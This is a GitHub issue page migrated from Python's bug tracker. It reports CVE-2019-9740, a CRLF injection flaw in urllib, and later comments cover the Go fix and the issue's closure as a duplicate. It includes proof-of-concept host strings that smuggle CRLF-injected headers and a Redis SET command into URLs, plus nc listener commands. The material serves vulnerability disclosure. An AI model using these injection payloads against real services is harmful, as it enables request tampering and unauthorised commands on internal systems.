New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[CVE-2019-9740] Python urllib CRLF injection vulnerability #80457
Comments
Abstract: Principles: Proof of Concept: #!/usr/bin/env python3 import sys
import urllib
import urllib.error
import urllib.request
host = "10.251.0.83:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a" try: In this script, the host parameter usually could be controlled by user, and the content of host above is exactly the payload. We setup a server using nc to open a 7777 port and to receive and display the HTTP request data from client , then run the code above on a client to sent a HTTP request to the server. # nc -l -p 7777 #end Attack Scenarios
import sys
import urllib
import urllib.error
import urllib.request
host = "10.251.0.83:6379?\r\nSET test success\r\n"
url = "http://" + host + ":8080/test/?test=a" try: Conclusion: |
I am also seeing the same issue with urllib3 import urllib3
pool_manager = urllib3.PoolManager()
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a" try: nc -l localhost 7777 |
And security issues should be reported according to https://www.python.org/news/security/ . |
Thanks for this report. Should we make this a duplicate of this bpo-30458 - as they are both referring to the same problem with the underlying library? |
Yep, if it's the same problem then close this as a dupe and just poke the other issue. |
OK |
For reference an exact report on golang repo : golang/go#30794 . This seemed to have been fixed in latest golang release 1.12 and commit golang/go@829c5df . The commit introduces a check for CTL characters and throws an error for URLs something similar to Python does for headers now at bf3e1c9b80e9. func isCTL(r rune) bool { if strings.IndexFunc(ruri, isCTL) != -1 {
return errors.New("net/http: can't write control character in Request.URL")
} So below program used to work before go 1.12 setting a key on Redis but now it throws error : package main import "fmt" func main() { ➜ go version Looking more into the commit there seemed to be a solution towards escaping characters with golang/go#22907 . The fix seemed to have broke Google's internal tests [0] and hence reverted to have the above commit where only CTL characters were checked and raises an error. I think this is a tricky bug upon reading code reviews in the golang repo that has around 2-3 reports with a fix committed to be reverted later for a more conservative fix and the issue was reopened to target go 1.13 . Thanks a lot for the report @ragdoll.guo [0] https://go-review.googlesource.com/c/go/+/159157/2#message-39c6be13a192bf760f6318ac641b432a6ab8fdc8 |
Marking this as duplicate of bpo-30458. Thanks for the discussion. |
I am going to make a note that the Superseder
However, this bug demonstrates a vulnerability in all versions of Python (including 3.8 as of March 2019). There are additional related bug reports that deal with the same topic of parsing CRLF in headers / or in requests. A consolidation of all of these is required, and at the end, our goal should be the close the loophole reported by this bug. I am assigning this bug to myself to work on it, and my first task is make sure that the previous reports 1, 2 and 3 cover the scenario mentioned in this report. If they do not, I will reopen this ticket. Thanks! |
The CVE-2019-9740 has been assigned to this issue: ... which has been marked as a duplicate of bpo-30458. |
Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.
Show more details
GitHub fields:
bugs.python.org fields:
The text was updated successfully, but these errors were encountered: